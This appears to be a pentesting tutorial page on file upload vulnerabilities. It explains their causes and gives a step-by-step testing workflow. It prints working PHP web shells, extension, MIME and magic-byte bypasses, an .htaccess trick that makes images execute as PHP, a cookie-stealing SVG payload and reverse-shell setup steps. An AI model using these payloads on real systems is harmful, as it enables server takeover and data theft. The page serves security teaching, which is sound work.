Home > Website Pentesting

File Upload Vulnerabilities

File Upload Vulnerabilities

File upload vulnerabilities occur when a web application allows users to upload files without proper validation, sanitization, or restrictions. These flaws let attackers upload malicious files such as web shells, scripts, malware, or executables, leading to full server compromise. File upload vulnerabilities are among the most dangerous because they directly enable remote code execution.

Understanding File Upload Functionality

Many applications allow users to upload files for:

  • profile pictures

  • documents

  • attachments

  • backups

  • media uploads

  • forms or reports

When the server receives a file, it must:

  • validate the file type

  • validate the content

  • restrict the filename

  • limit the upload directory

  • prevent execution

  • restrict size and metadata

If any step is misconfigured, attackers can abuse the upload mechanism.

How File Upload Vulnerabilities Happen

These vulnerabilities occur when developers trust the uploaded file too much. Common causes include:

  • validating file type only by extension

  • relying on client-side validation

  • failing to check MIME types

  • failing to sanitize filenames

  • storing files in executable directories

  • allowing dangerous file types

  • allowing double extensions

  • not verifying file content

  • not restricting uploads to safe locations

  • not renaming files

If the server processes the uploaded file, attackers may gain execution.

Types of File Upload Vulnerabilities

Unrestricted File Upload

Server accepts any file type.

Example:
Upload shell.php directly into /uploads/.

Restricted by Extension Only

Application checks extension:

Allowed: .jpg, .png

Attacker renames:

shell.php.jpg

If the server processes the file as PHP due to misconfiguration, execution occurs.

Double Extension Bypass

shell.php.jpg
shell.asp;.jpg
shell.php%00.jpg

File might execute depending on how the backend interprets the filename.

Content-Type Bypass

Client sends:

Content-Type: image/jpeg

But uploads a PHP script.
Server trusts the MIME header → vulnerable.

Magic Bytes Bypass

Attackers prepend image magic bytes:

\xFF\xD8\xFF

To make the file appear as JPEG, but after the header insert PHP code:

<?php system($_GET['cmd']); ?>

Race Condition Upload

Two simultaneous requests:

  1. Upload malicious file

  2. Rename it before validation completes

Upload Overwrite Attacks

Attacker overwrites:

  • .htaccess

  • config files

  • existing scripts

Client-Side Validation Only

JavaScript checks file type:

if (!file.type.match('image/jpeg')) alert('Invalid file')

Attacker disables JS → bypass.

Stored XSS via File Upload

Uploading HTML, SVG, or JS files:

evil.svg containing <script>alert(1)</script>

If served directly, executes in browser.

Local File Inclusion + File Upload Chain

Upload file, then include it:

/uploads/shell.php

Use LFI:

?page=../../uploads/shell.php

Results in remote code execution.

Practical File Upload Testing Workflow

Step 1: Identify Upload Functionality

Look for:

  • profile picture upload

  • document submission

  • resume upload

  • image upload

  • import/export features

  • media libraries

Step 2: Test File Extensions

Try uploading:

shell.php
shell.asp
shell.jsp

If blocked, try double extensions:

shell.php.jpg
shell.php.png
script.jsp;.jpg

Step 3: Test MIME Type Manipulation

Modify request in Burp Suite:

Content-Type: image/jpeg

But send raw PHP content.

Step 4: Test Magic Bytes Bypass

Place valid image bytes at top:

FF D8 FF E0

Then include PHP payload:

<?php system($_GET['cmd']); ?>

Step 5: Test Filename Manipulation

Try:

../../shell.php

If directory traversal works, the file may be placed outside upload folder.

Step 6: Check Upload Directory Accessibility

Discover uploaded file location:

  • predictable paths

  • response reveals full path

  • file listing enabled

  • directory browsing enabled

Typical directories:

/uploads/
/files/
/images/
/media/
/profile-pics/

Access:

http://target.com/uploads/shell.php

If it executes, full compromise achieved.

Step 7: Analyze Server Handling

Inspect server behavior:

  • Does it rename the file?

  • Does it change the extension?

  • Does it rewrite the file?

  • Is the file content modified?

Step 8: Attempt Script Execution

Upload:

<?php echo shell_exec($_GET['cmd']); ?>

Access:

http://target.com/uploads/shell.php?cmd=id

If output appears → RCE gained.

Step 9: Test Non-PHP Environments

Node.js

Upload:

shell.js

Try LFI to include it.

Python

Upload .py and check if server accidentally executes it.

ASP/ASP.NET

shell.asp
shell.aspx

Step 10: Test Hidden Execution Vectors

Upload .htaccess to allow PHP execution

Content:

AddType application/x-httpd-php .jpg

Upload image.jpg containing PHP code.

Upload SVG

SVG supports JS:

<svg><script>alert(1)</script></svg>

SVG sometimes treated as image → XSS.

Real Malicious Upload Payloads

Basic PHP Web Shell

<?php system($_GET['cmd']); ?>

More Advanced Web Shell

<?php echo shell_exec($_REQUEST['cmd']); ?>

Pentest Monkey Shell

Upload:

php-reverse-shell.php

Modify:

$ip = "YOUR_IP";
$port = 4444;

Then access file to spawn reverse shell.

Malicious SVG

<svg/onload=alert(document.cookie)>

Malicious HTML

<script>alert(1)</script>

If the server serves HTML, this executes as XSS.

Upload Restrictions and Bypass Techniques

Bypass Extension Filters

  • double extensions

  • case-insensitive extensions

  • Unicode characters

  • null byte %00 injection

  • trailing spaces

Examples:

shell.pHp
shell.php%00.jpg
shell.php.  
shell.php%20

Bypass MIME Checks

Modify:

Content-Type: video/mp4

Bypass Magic Bytes

Use valid header:

FF D8 FF

Then append payload.

Bypass File Content Scanners

Split payload inside harmless content, or use non-standard syntax:

<?=`id`?>

Why File Upload Vulnerabilities Occur

File upload issues exist because developers rely on:

  • client-side validation

  • extension checks only

  • insecure MIME validation

  • trusting file contents

  • placing uploads in executable directories

  • improper access controls

  • missing file renaming

  • no sanitization of filenames

Uploading untrusted files is inherently risky and requires strict security controls.

Impact of File Upload Vulnerabilities

File upload issues lead directly to:

  • Remote code execution

  • Web shell deployment

  • Server takeover

  • Data theft

  • Defacement

  • Malware distribution

  • Privilege escalation

  • Full application compromise

Due to the severity and ease of exploitation, file upload vulnerabilities are considered extremely critical in pentesting.

Intel Dump

  • File upload vulnerabilities occur when applications incorrectly validate, store, or process uploaded files.

  • Attackers upload malicious scripts, double-extension files, or encoded payloads.

  • Bypasses include MIME spoofing, magic bytes, null-byte injection, and .htaccess tricks.

  • Uploaded files in executable directories lead to instant remote code execution.

  • Testing includes manipulating filenames, content, headers, and encoding.

  • Impact includes web shells, reverse shells, server takeover, and unrestricted execution.

HOME LEARN COMMUNITY DASHBOARD